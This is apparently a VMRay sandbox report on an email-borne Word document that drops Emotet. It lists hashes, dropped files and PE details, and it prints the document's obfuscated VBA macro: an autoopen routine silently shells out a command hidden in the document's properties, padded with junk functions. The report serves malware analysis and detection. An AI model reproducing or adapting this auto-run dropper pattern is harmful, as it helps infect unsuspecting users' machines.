Word Doc in Attached Email Downloads Emotet | Files
Try VMRay Analyzer
File Information
Sample files count 1
Created files count 4
Modified files count 0
c:\users\atveydl98z\desktop\49343.doc
-
File Properties
Names c:\users\atveydl98z\desktop\49343.doc (Sample File)
Size 89.00 KB (91136 bytes)
Hash Values MD5: 890ce730a3cf43f43039f114744df924
SHA1: 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a
SHA256: d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
Actions
VBA Information
+
VBA Properties
Module Count 1
Macro Count 25
Module1.bas - Activate Workbook
+ 
Sub autoopen()
mFAVwZDEr
End Sub
Module1.bas - Eventless
+ 
Function KvRCBMNS()
Dim LMymZeBnT(2529)
LMymZeBnT(1446) = 8729 + 4015 / 7486 / 6644 / 2785 - 4156 + 1671 + 1621
 LMymZeBnT(175) = 6727 + 3749 / 2084 / 6651 / 2226 - 4594 - 2193 + 7969
LMymZeBnT(561) = Bvhvbny
 LMymZeBnT(2449) = GrgGzTyygzg
 LMymZeBnT(1799) = kDeGvDeHBEd
 LMymZeBnT(765) = MwASNGy
 LMymZeBnT(2210) = VcVCSVcBZGR
 LMymZeBnT(2285) = pSsyLnr
 LMymZeBnT(1072) = LaCbgNn
 LMymZeBnT(138) = XGZbySUN
 LMymZeBnT(2342) = PrUzZbaXhNR
 LMymZeBnT(763) = zErXbTBtP
 LMymZeBnT(239) = HdtwfkN
 LMymZeBnT(2464) = dppBDCapf
 LMymZeBnT(2404) = UTNnrHvZh
 LMymZeBnT(435) = zhnYZsSx
End Function
Function zxkKZatS()
Dim MUSDsdTpm(8023)
MUSDsdTpm(1547) = 8507 + 3715 + 7390 / 1139 - 7686 - 1394 - 3729 + 5591 + 6346 + 3830
 MUSDsdTpm(5496) = 3179 + 1176 / 7152 - 7866 + 8387 + 7334 + 3666
 MUSDsdTpm(6901) = 3699 + 464 / 2847 / 8537 - 1494 - 4533 - 7135 + 5793 + 991
MUSDsdTpm(2356) = BNVUASu
 MUSDsdTpm(5811) = pfxyacFHhV
 MUSDsdTpm(4778) = nfcVuNST
 MUSDsdTpm(3553) = KKsAPpcZpey
 MUSDsdTpm(6172) = GgertpH
 MUSDsdTpm(3112) = ecTDmEyRUr
 MUSDsdTpm(4214) = aNmezFdLCmu
 MUSDsdTpm(6856) = HcfUURfCg
 MUSDsdTpm(2833) = WuNtuvWUw
 MUSDsdTpm(2854) = xBwvyYZeNk
 MUSDsdTpm(818) = KuCetnGYMS
 MUSDsdTpm(3710) = ADEFKKLExy
 MUSDsdTpm(6523) = caNmUmfBS
 MUSDsdTpm(7145) = TDDMxWGeV
 MUSDsdTpm(4932) = nAYPVLTzHP
 MUSDsdTpm(4723) = MUnbKhhrM
 MUSDsdTpm(2494) = zLeZyXb
 MUSDsdTpm(4785) = aUUbaHB
 MUSDsdTpm(6003) = eLEUnGcHkTH
 MUSDsdTpm(4097) = FgbKwZMY
 MUSDsdTpm(2916) = tnckDDSYY
 MUSDsdTpm(4307) = WHTZHaev
 MUSDsdTpm(6864) = chDaYNWmP
 MUSDsdTpm(2193) = zXxtNNRpD
 MUSDsdTpm(2563) = sbAXRGR
 MUSDsdTpm(6124) = PruYVpHa
 MUSDsdTpm(4923) = VMSzhbAdrVP
 MUSDsdTpm(3938) = bBzmAYNDR
 MUSDsdTpm(1034) = BgFXfTr
 MUSDsdTpm(2729) = xtFvsAKB
End Function
Function vwewdzmCG()
Dim dEUUeywwRMF(9690)
dEUUeywwRMF(741) = 1224 + 2152 + 5852 + 9540 / 2903 / 6527 - 9406 - 4708 + 1567 + 2937
 dEUUeywwRMF(7976) = 1014 + 7679 + 3864 + 1676 / 5996 / 3882 - 161 - 4895 + 4065 + 6909
dEUUeywwRMF(1751) = tYazbXxCNT
 dEUUeywwRMF(2776) = NuDCsTAPLPk
 dEUUeywwRMF(1652) = ebvDZPdpZsy
 dEUUeywwRMF(4913) = CUNZMYe
 dEUUeywwRMF(8863) = muZhmRr
 dEUUeywwRMF(5853) = uGsbefvYXRP
 dEUUeywwRMF(9372) = GsVazkZS
 dEUUeywwRMF(3478) = wUmUtLhPy
 dEUUeywwRMF(5719) = egzYLLVHD
 dEUUeywwRMF(3811) = RwfzfLZysD
 dEUUeywwRMF(9051) = ttdrMdsmykS
 dEUUeywwRMF(9395) = ztXFkXHNseL
 dEUUeywwRMF(1518) = cvYaAvhk
 dEUUeywwRMF(4598) = PNWXuHhs
 dEUUeywwRMF(2545) = svkArnN
 dEUUeywwRMF(7865) = szvzSgamBf
 dEUUeywwRMF(7016) = hDwHTMuptC
 dEUUeywwRMF(6991) = WMZUUYPwhZ
 dEUUeywwRMF(542) = hpWXAwLmLYv
 dEUUeywwRMF(2487) = HBeVWrpAB
 dEUUeywwRMF(4899) = CPRYAdHwkTZ
 dEUUeywwRMF(8603) = mFCdEgmrgr
 dEUUeywwRMF(878) = YWPDTErH
 dEUUeywwRMF(8488) = vnMHNnRnT
 dEUUeywwRMF(9551) = WnPmpFADzEX
 dEUUeywwRMF(9252) = azxrthzrfP
 dEUUeywwRMF(5148) = rmYSZsceykH
 dEUUeywwRMF(8137) = MEfWGVkRHfT
 dEUUeywwRMF(9256) = AMvBduVrX
 dEUUeywwRMF(1474) = CSERTFBTLe
End Function
Function VWLBafszR()
Dim RutsTCMXc(5215)
RutsTCMXc(2810) = 8562 + 4583 / 4600 / 3484 - 5235 + 7632 + 2021 + 4246
 RutsTCMXc(2322) = 2401 + 8364 / 9723 / 8683 - 2930 - 2116 - 6859 + 2276
RutsTCMXc(1777) = muWFmKYxd
 RutsTCMXc(3509) = RnXZbXGP
 RutsTCMXc(2132) = uFYaLHHRa
 RutsTCMXc(2659) = MVxPwWed
 RutsTCMXc(1382) = MfBFrLSEZsF
 RutsTCMXc(279) = epAYkRUaV
 RutsTCMXc(2919) = rBAPsgdUZ
 RutsTCMXc(1271) = BydDuUZ
 RutsTCMXc(4350) = eXPPkeHc
 RutsTCMXc(4191) = CTKSnCpP
 RutsTCMXc(4786) = BNYVMbtApGu
 RutsTCMXc(531) = xGnSxTRUCVa
 RutsTCMXc(622) = dYWMfDUyyK
 RutsTCMXc(301) = aGVZYRSnx
 RutsTCMXc(3437) = bEGAMUGxvgk
 RutsTCMXc(3741) = KxxfKfX
 RutsTCMXc(1193) = ptuahxcHBz
 RutsTCMXc(1852) = rmCaPECXAu
 RutsTCMXc(123) = xufwffWkrc
 RutsTCMXc(437) = aaPgrXw
 RutsTCMXc(3292) = SKbvGnhS
 RutsTCMXc(1731) = eYcwdnsX
 RutsTCMXc(1743) = BDeSczbE
 RutsTCMXc(1081) = AggzftDa
 RutsTCMXc(2272) = HBgDyzXDZa
 RutsTCMXc(4215) = tENAmBtgdhY
 RutsTCMXc(3034) = UUWXKseGHdk
End Function
Function VBnCAbnNA()
Dim HEBZKuBYs(1038)
HEBZKuBYs(566) = 7669 + 5422 / 2359 - 4617 - 8412 + 7694 + 7153
 HEBZKuBYs(896) = 5407 + 6133 + 3574 / 6418 / 7058 - 4982 + 6805 + 5256
HEBZKuBYs(393) = TtEggSfgeCN
 HEBZKuBYs(636) = gyzccGWxFp
 HEBZKuBYs(176) = KzSesWabM
 HEBZKuBYs(837) = zzbHRGa
 HEBZKuBYs(486) = VufauuEmMpX
 HEBZKuBYs(883) = eDzWdVLg
End Function
Function mcfddkHaRzY()
Dim VBcavUmheGY(8954)
VBcavUmheGY(7304) = 5033 + 4668 + 3657 / 6914 / 1788 - 3016 - 1737 + 9932 + 2778
VBcavUmheGY(5594) = sTvMcDSxUU
 VBcavUmheGY(6590) = xpVuRsyAb
 VBcavUmheGY(2946) = bugpEzBrT
 VBcavUmheGY(8332) = LATcDUEwB
 VBcavUmheGY(6907) = BYrVSELc
 VBcavUmheGY(3965) = NEUUxewLxk
 VBcavUmheGY(5006) = kvCHgknFZS
 VBcavUmheGY(746) = kahUVCFWCR
 VBcavUmheGY(8703) = xbVCbtry
 VBcavUmheGY(2015) = EbVSUGYk
 VBcavUmheGY(4569) = vgKCpged
 VBcavUmheGY(5257) = MetYFHuGhEw
 VBcavUmheGY(8613) = cgtGDutgbp
 VBcavUmheGY(3875) = SWRBhexK
 VBcavUmheGY(393) = DBFDbNL
 VBcavUmheGY(4240) = MdVskUh
 VBcavUmheGY(4897) = TMKwFZTGeE
 VBcavUmheGY(138) = nWFzRFr
End Function
Function nsYNNXGv()
Dim DYRUtBvbK(532)
DYRUtBvbK(345) = 991 + 194 + 7456 / 9784 / 746 - 5902 - 7887 - 6927 + 7317
DYRUtBvbK(415) = ghrKkkRde
 DYRUtBvbK(514) = PBHPfvPhHNe
 DYRUtBvbK(468) = FgKhcgnma
 DYRUtBvbK(328) = SthLyrmy
 DYRUtBvbK(235) = WmNBZFRv
 DYRUtBvbK(306) = yhDtevr
 DYRUtBvbK(264) = WPMEhPg
 DYRUtBvbK(430) = hTTUHcMK
 DYRUtBvbK(147) = LHwnwLE
 DYRUtBvbK(82) = XtYTgmwBhMc
 DYRUtBvbK(72) = ERkVKEVtPpM
 DYRUtBvbK(230) = ahFxfWemW
 DYRUtBvbK(303) = dxpctLf
 DYRUtBvbK(317) = vFsGUnxTA
 DYRUtBvbK(300) = GDZASPEGR
 DYRUtBvbK(379) = AKshmcmevB
 DYRUtBvbK(292) = UvsZXwWAHm
 DYRUtBvbK(188) = KrEWRBSHtt
 DYRUtBvbK(243) = nMEbcEHXSx
 DYRUtBvbK(223) = nbZNpnZVr
 DYRUtBvbK(173) = cHRkKXmyUn
 DYRUtBvbK(274) = DSWCGvbeyn
 DYRUtBvbK(315) = fPTAyDgrenS
 DYRUtBvbK(265) = LWuBUcc
 DYRUtBvbK(476) = tXEFLaMRh
End Function
Function zmREnrvEYu()
Dim ELMswbgSnE(1680)
ELMswbgSnE(1477) = 9904 + 2297 / 1124 / 9048 - 4243 - 6734 + 3359 + 6342
 ELMswbgSnE(1419) = 1915 + 7210 + 4448 + 9234 / 2231 - 1549 + 8474 + 1677
ELMswbgSnE(96) = nRYdzbE
 ELMswbgSnE(914) = tgVnfYgyN
 ELMswbgSnE(654) = VcvYAHP
 ELMswbgSnE(1116) = FCLuHaaetgR
 ELMswbgSnE(333) = gHDFRxY
 ELMswbgSnE(134) = sfaynHnhB
 ELMswbgSnE(1389) = PFXgnWyhEf
 ELMswbgSnE(364) = ttfPwgNxybL
 ELMswbgSnE(859) = EBCVcuw
 ELMswbgSnE(1010) = HPvUWtXgWHu
 ELMswbgSnE(593) = zhHaZXTg
 ELMswbgSnE(269) = vaEhAwumaf
 ELMswbgSnE(593) = mRZHPgyAh
 ELMswbgSnE(1520) = YryTsHWKrY
 ELMswbgSnE(1340) = xTAytcLHKv
 ELMswbgSnE(1119) = ZVwtTzD
 ELMswbgSnE(736) = CtLMRdAw
 ELMswbgSnE(1510) = CdRKwFPVVZd
 ELMswbgSnE(1666) = tYPUkkX
 ELMswbgSnE(1594) = wwdYxHVm
 ELMswbgSnE(1102) = BTEwvAnrhrg
 ELMswbgSnE(1413) = RnGstPkfa
 ELMswbgSnE(923) = ZyxphrX
End Function
Function uRXuyvw()
Dim NKpMEazMxCc(420)
NKpMEazMxCc(112) = 3683 + 6261 / 7797 / 6831 / 4209 - 4881 + 8386
NKpMEazMxCc(353) = NWrfKTSfy
 NKpMEazMxCc(381) = mutCKSC
 NKpMEazMxCc(171) = SURgwHuBa
 NKpMEazMxCc(417) = zmtwAza
 NKpMEazMxCc(354) = sLcwxdGNu
 NKpMEazMxCc(65) = RMWWdMamX
 NKpMEazMxCc(349) = ETNWwUwV
 NKpMEazMxCc(139) = atvsdKU
 NKpMEazMxCc(367) = VeWKNexZFmR
 NKpMEazMxCc(70) = ZUCWAyMN
 NKpMEazMxCc(263) = LFUWuwWzyAA
 NKpMEazMxCc(271) = sFUwyZeC
 NKpMEazMxCc(314) = NYxbtZtt
 NKpMEazMxCc(93) = SRhKnYNyurG
 NKpMEazMxCc(351) = beybhBFd
 NKpMEazMxCc(306) = atWvfThC
 NKpMEazMxCc(207) = SCXCLGDwLzz
End Function
Function DWEspxAgu()
Dim xRZUfunPFD(3132)
xRZUfunPFD(907) = 2187 + 5300 + 4799 + 1966 / 3758 - 6886 - 2355 - 4481 + 166
 xRZUfunPFD(1784) = 5432 + 2194 / 3622 - 2440 - 6330 - 187 + 7893 + 2485
xRZUfunPFD(1510) = tPrtZveVDy
 xRZUfunPFD(2683) = TdSFCLxuYvU
 xRZUfunPFD(725) = HxrURBTtv
 xRZUfunPFD(223) = ZuYEbVR
 xRZUfunPFD(2897) = WvenubUXvN
 xRZUfunPFD(1055) = HkwZXKKGCz
 xRZUfunPFD(1675) = LZXeNwazXMT
 xRZUfunPFD(436) = fbzCZpw
 xRZUfunPFD(1124) = mKzREcTYBA
 xRZUfunPFD(503) = WugZRrTdCAh
 xRZUfunPFD(986) = LTFffgnEz
 xRZUfunPFD(166) = eMLwDdXp
 xRZUfunPFD(1451) = txMEZpzc
 xRZUfunPFD(2215) = hfmbmCPKgSw
End Function
Public Function SzxKTBtfzUZ(VHabMPRv)
KdxXEYNMGz = 3254 + 5809 + 2718 + 9580 / 8486 / 5877 - 7362 - 5488 - 6909 + 199 + 4239 + 3011
 xVUysvHR = 5588 + 4126 + 3664 + 9802 / 9108 / 4468 / 8681 - 1541 - 6105 + 9362 + 6047
 HKgDWchDY = 5884 + 4153 + 6710 / 7679 - 4433 - 2432 - 1493 + 246 + 5269
SzxKTBtfzUZ = ActiveDocument.CustomDocumentProperties(VHabMPRv)
End Function
Public Function bktLAfLdCk()
kMfPvfp = 3845 + 9649 + 6684 + 5627 / 3420 / 7360 - 163 - 5156 - 3966 + 3070 + 8973 + 9252
npTbERzMkYx = SzxKTBtfzUZ("UDgGzdZfCck") + SzxKTBtfzUZ("gDVvfVFdYuf") + SzxKTBtfzUZ("cvNpMeMWfd") + SzxKTBtfzUZ("MSsHVeXmKLY")
TFGxZFCHzN = 1863 + 5422 + 1255 / 3353 / 9002 - 1247 + 9005 + 639 + 4276
 wWVCzWA = 3228 + 6907 + 6576 / 555 / 8586 / 6752 - 4602 - 7940 + 9347 + 7736 + 1226
 rrcsHyFa = 1322 + 1741 + 7568 / 3901 / 9838 / 6404 - 6983 + 5251 + 7894
 KnCDGVfwkb = 7712 + 8204 + 7466 / 1856 / 7216 / 7690 - 9783 - 3000 + 6775 + 5094
 rNcAXrs = 4864 + 6088 + 8970 / 6897 - 8071 - 9068 + 6229
 pPkzAma = 5551 + 9141 + 6155 / 9096 / 4604 / 2405 - 8678 - 9693 - 4251 + 7642 + 3026 + 2441
 xfzYTEPCRLb = 5532 + 3486 / 5846 / 5546 / 6562 - 4732 + 7462
 YFBLePxRLdm = 6798 + 6895 + 6266 / 6181 / 1193 / 7752 - 817 - 7320 + 9904
 RDKwUdLed = 162 + 1695 + 9676 / 6583 / 6277 / 2866 - 8600 - 8400 - 1249 + 1646
TFewfMhzR = SzxKTBtfzUZ("NPnrvuZ") + SzxKTBtfzUZ("TZgPnVEb") + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + SzxKTBtfzUZ("RdMTHNLBL") + SzxKTBtfzUZ("KWPswMv") + SzxKTBtfzUZ("SxxdKKYSSM")
HuPgEfxZTv = 8014 + 4923 + 2713 / 520 / 4052 / 4286 - 9954 + 4093 + 2101 + 2193
 SvmLeKEWV = 3289 + 1483 + 3558 / 6135 / 7890 / 7580 - 3873 - 6680 - 5486 + 8437 + 2446 + 7214
UNTEwnDp = TFewfMhzR + npTbERzMkYx
nYGuBFmsZe = 1672 + 3032 + 7196 + 887 / 5821 - 5743 - 3896 - 2994 + 875 + 4336
 mguystETn = 2577 + 7968 + 4919 / 9034 - 4707 - 1445 - 5135 + 3290 + 6217
 YSRwUEaa = 1991 + 1487 / 4345 / 1911 / 7132 - 5481 - 2082 - 3352 + 9675
 uUBFDBpWbC = 4248 + 1563 + 3266 + 3546 / 9980 - 4936 + 6992
 eBEcYMf = 9045 + 6209 / 7831 / 2928 / 298 - 1459 + 3548 + 496 + 873
bktLAfLdCk = UNTEwnDp + ActiveDocument.BuiltInDocumentProperties("Comments") + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + rtnNnpKD
End Function
Public Function YxvxhhMgSFb()
FavmyWKsL = 1610 + 5119 + 687 + 7277 / 6870 / 3128 / 5309 - 397 - 2390 - 4527 + 1609
 EvyeWsTdFB = 6063 + 9665 / 3767 - 2628 + 7455 + 5809 + 1681
 BgMbuVWDDVR = 8909 + 5467 + 2579 + 4716 / 3342 / 5961 / 799 - 4420 - 3935 + 3120 + 240 + 6310
 kYsWbUN = 6046 + 2797 + 7601 / 9911 / 8508 - 4655 - 9530 - 7683 + 8231
 hXkUGNy = 3400 + 6950 + 5761 / 4545 / 7085 - 2310 - 5136 - 3447 + 3015 + 5366
 cvSssYG = 7935 + 9099 + 2758 / 1771 - 688 + 1314 + 3495 + 5707
 sAAWHuwKT = 3351 + 4084 + 6878 / 3317 - 4988 - 868 + 6841
YxvxhhMgSFb = SzxKTBtfzUZ("XpkwnxwTANb") + SzxKTBtfzUZ("ZxdCPxP") + SzxKTBtfzUZ("erxFtYrPrH")
End Function
Public Function mFAVwZDEr()
NHMuXYT = 7890 + 9008 / 5012 / 1995 / 8568 - 6298 + 1589
 gxbgZpEr = 6668 + 4130 + 2846 + 4614 / 3298 - 8533 - 4357 + 616 + 2491 + 7282
 ZKrWVeu = 5437 + 7407 + 4988 / 8718 / 1532 / 2038 - 8085 + 4298 + 4938 + 6245
VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
End Function

Function MZBKGfp()
Dim KrBTZNA(8153)
KrBTZNA(5963) = 7122 + 527 + 6654 + 8388 / 2783 - 6758 + 560
KrBTZNA(1548) = ELXXNCKV
End Function
Function eGBaPury()
Dim PUdNVKKYsBy(8375)
PUdNVKKYsBy(2001) = 5154 + 8186 / 281 / 1463 - 1676 - 7888 + 4258 + 9082 + 4974
 PUdNVKKYsBy(4902) = 7943 + 6373 / 587 - 1282 - 5679 - 516 + 6707 + 4687
 PUdNVKKYsBy(3865) = 2647 + 8864 + 7095 + 2109 / 5917 - 724 - 3685 - 9045 + 3888 + 701 + 8349
PUdNVKKYsBy(1239) = sfVUrYXwUmT
End Function
Function DSZpDyc()
Dim BMzbGGAz(2552)
BMzbGGAz(2373) = 4303 + 4438 / 9833 / 8918 / 9789 - 3607 - 8474 - 9143 + 6689 + 3366
BMzbGGAz(1082) = tpYAKLa
 BMzbGGAz(2547) = XUUNMZVsG
End Function
Function dgdDpMkuBM()
Dim tXfTpPKpw(9202)
tXfTpPKpw(876) = 1050 + 1628 / 1092 - 8284 + 1141 + 4463 + 1384
 tXfTpPKpw(4552) = 2444 + 6718 + 3809 / 2757 - 4122 - 9431 + 4963 + 949 + 7620
 tXfTpPKpw(1209) = 2028 + 5594 + 7240 / 1857 / 1779 - 8596 - 9918 + 4965
tXfTpPKpw(6755) = AvHYHdG
 tXfTpPKpw(2750) = mEbgScdEuMM
 tXfTpPKpw(3506) = TXskPtY
End Function
Function sVrCPtvhyn()
Dim hgcCLPgsPk(8203)
hgcCLPgsPk(6548) = 1867 + 3494 + 5144 / 8569 / 9221 / 6427 - 2823 - 7982 - 900 + 8337 + 3607 + 7123
 hgcCLPgsPk(4189) = 7479 + 4004 / 5285 / 2717 - 2016 - 1108 + 2820 + 1751
 hgcCLPgsPk(6289) = 7444 + 1710 / 590 / 7445 - 6055 + 4114 + 2437
hgcCLPgsPk(3779) = EUMbxezCDww
End Function
Function mKMPmybePB()
Dim vubfFfrdHe(1423)
vubfFfrdHe(218) = 2608 + 6474 / 2911 / 3470 - 8849 - 6073 + 5326 + 3977
 vubfFfrdHe(1420) = 1789 + 5680 / 2098 / 7617 / 2639 - 9725 - 7647 + 7970
vubfFfrdHe(1034) = MpmcwxKYA
 vubfFfrdHe(361) = yvexypTdVw
 vubfFfrdHe(753) = NFebFNfWDUn
 vubfFfrdHe(415) = Cyzpwmy
End Function
Function phRPtNpZ()
Dim URBgEfRvHv(5460)
URBgEfRvHv(1542) = 5717 + 9843 / 8989 - 4743 - 3188 - 5575 + 7743
URBgEfRvHv(3537) = HSeCSvfs
 URBgEfRvHv(2267) = gPWcUArMfCs
 URBgEfRvHv(166) = KzPvKEYLRX
 URBgEfRvHv(192) = SmtgtDmaeBW
End Function
Function CTHgdDf()
Dim UnKcLwMwBVT(4050)
UnKcLwMwBVT(2954) = 9024 + 5486 + 595 / 6471 - 8360 - 8734 - 1582 + 3917 + 3259 + 8377
 UnKcLwMwBVT(1058) = 213 + 8914 / 5422 / 1500 - 4766 + 4321 + 1339
 UnKcLwMwBVT(3433) = 2033 + 7035 + 7154 + 2366 / 4264 / 8297 / 6453 - 961 - 3605 + 2372 + 3767
 UnKcLwMwBVT(426) = 3158 + 8753 + 2257 / 925 / 8889 - 3976 - 9535 + 7950 + 1520 + 699
UnKcLwMwBVT(3899) = AgNvaNrzGB
 UnKcLwMwBVT(605) = ALFSNeH
 UnKcLwMwBVT(3769) = xdytHBD
End Function
Function SVLeRzys()
Dim HTnMuZBK(4251)
HTnMuZBK(1828) = 5507 + 9270 + 6482 / 8883 - 7397 - 4137 + 6460 + 873 + 5343
 HTnMuZBK(3200) = 3606 + 7667 + 9983 / 7114 / 68 - 1992 - 8442 - 8901 + 3508 + 8115 + 1729
 HTnMuZBK(2035) = 5750 + 8955 / 2572 / 4772 / 9121 - 5063 - 1854 + 7277 + 5682
HTnMuZBK(675) = gRfmczbcsVb
 HTnMuZBK(2504) = FXEgcmwmEHm
 HTnMuZBK(1552) = FnXAazds
 HTnMuZBK(3060) = ZHdXXxu
End Function
Function TGgHgym()
Dim TrTyEurgdh(7434)
TrTyEurgdh(1913) = 6199 + 1949 + 5209 / 4349 - 3974 - 7133 + 4658
 TrTyEurgdh(593) = 853 + 3617 + 8058 / 7151 / 3146 / 7021 - 6339 - 4379 + 3455 + 8346
 TrTyEurgdh(3389) = 3185 + 995 / 8137 - 830 - 4690 + 9750 + 9135 + 2635
TrTyEurgdh(1832) = fpnkdFBeUw
 TrTyEurgdh(5922) = yXUGsyH
 TrTyEurgdh(3913) = vEwaCvtUg
End Function
c:\users\atveydl98z\appdata\local\temp\38763.exe, ...
-
File Properties
Names c:\users\atveydl98z\appdata\local\temp\38763.exe (Created File)
c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe (Created File)
Size 84.00 KB (86016 bytes)
Hash Values MD5: 1b1e6729790854252dfba6c77f198a4e
SHA1: 327c94b435802f77d12913956b28c70d00ab2de5
SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x401390
Size Of Code 0x3000
Size Of Initialized Data 0x12000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-08-31 15:34:18
Compiler/Packer Unknown
Sections (4)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2761 0x3000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 5.65
.rdata 0x404000 0x50c 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ 1.83
.data 0x405000 0x10e8 0x1000 0x5000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 0.43
y 0x407000 0xe009 0xf000 0x6000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 7.67
Imports (21)
+
WINSPOOL.DRV (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
DeletePrintProcessorA 0x0 0x40405c 0x42ec 0x42ec
GDI32.dll (2)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetTextExtentExPointI 0x0 0x404000 0x4290 0x4290
GetTextFaceA 0x0 0x404004 0x4294 0x4294
OLEAUT32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadTypeLib 0xa1 0x404054 0x42e4 0x42e4
KERNEL32.dll (17)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadLibraryA 0x0 0x40400c 0x429c 0x429c
GetConsoleCP 0x0 0x404010 0x42a0 0x42a0
GetLastError 0x0 0x404014 0x42a4 0x42a4
InterlockedExchange 0x0 0x404018 0x42a8 0x42a8
GetCommandLineA 0x0 0x40401c 0x42ac 0x42ac
HeapFree 0x0 0x404020 0x42b0 0x42b0
GetConsoleCursorInfo 0x0 0x404024 0x42b4 0x42b4
GetConsoleDisplayMode 0x0 0x404028 0x42b8 0x42b8
GetConsoleFontSize 0x0 0x40402c 0x42bc 0x42bc
RaiseException 0x0 0x404030 0x42c0 0x42c0
HeapAlloc 0x0 0x404034 0x42c4 0x42c4
GetCurrentProcess 0x0 0x404038 0x42c8 0x42c8
lstrlenA 0x0 0x40403c 0x42cc 0x42cc
LocalAlloc 0x0 0x404040 0x42d0 0x42d0
LocalFree 0x0 0x404044 0x42d4 0x42d4
GetProcAddress 0x0 0x404048 0x42d8 0x42d8
FreeLibrary 0x0 0x40404c 0x42dc 0x42dc
c:\programdata\9f1b.tmp, ...
-
File Properties
Names c:\programdata\9f1b.tmp (Created File)
c:\programdata\9f1c.tmp (Created File)
c:\programdata\9f2d.tmp (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\programdata\9f1c.tmp
-
File Properties
Names c:\programdata\9f1c.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
Actions
c:\programdata\9f1b.tmp
-
File Properties
Names c:\programdata\9f1b.tmp (Created File)
Size 0.08 KB (84 bytes)
Hash Values MD5: fdf031de948302c61dede50cd61fa096
SHA1: d926af57565c1448dd81009ed90e324575e9b481
SHA256: 370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5
Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image